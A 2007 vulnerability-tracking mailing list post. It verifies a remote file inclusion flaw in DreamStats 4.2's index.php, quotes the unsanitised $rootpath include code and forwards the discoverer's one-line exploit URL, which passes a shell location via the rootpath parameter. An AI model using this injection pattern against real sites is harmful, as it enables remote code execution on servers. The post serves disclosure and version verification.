[VIM] true: DreamStats V 4.2=(index.php)=>Remote File Include

str0ke str0ke at milw0rm.com
Fri Feb 2 10:13:33 EST 2007


The section that matters is lines 17-22.

<index.php>
// +---------------------------------------------+
// |     Copyright (c) 2004 – 2005 mnProjects      |
// |     http://www.mnprojects.com               |
// |     DreamStats System by Miguel Nunes       |
// +---------------------------------------------+

error_reporting(E_ALL ^ E_NOTICE);

//   D r e a m S t a t s
//
//   For Call of Duty 2 version 1.0

define('in_main', true);
define('in_dreamstats', true);

if (!isset($_GET['server'])) {

################################### Includes ###################################

@include($rootpath . 'includes/ip_vers.php');
@include($rootpath . 'includes/core.php');

Thats about as vulnerable as we get.

This is for version 4.2 (4.1 and below were not downloadable), 5.0
isn't vulnerable.

/str0ke

ConTact Me:-wWw.Asb-May.Net
ScRiPt:-http://callofduty.filefront.com/file/DreamStats_System;54520
Discovered By:- ThE dE at Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>>
******************************************************************************
index.php:-
if (!$slots) {include($rootpath . 'html/serveroffline.php');exit;}
********************************************************************************
ExPlOiT:-http://www.Site.com/PaTh/upload/index.php?rootpath=[Shell]
********************************************************************************

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now!
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/


More information about the VIM mailing list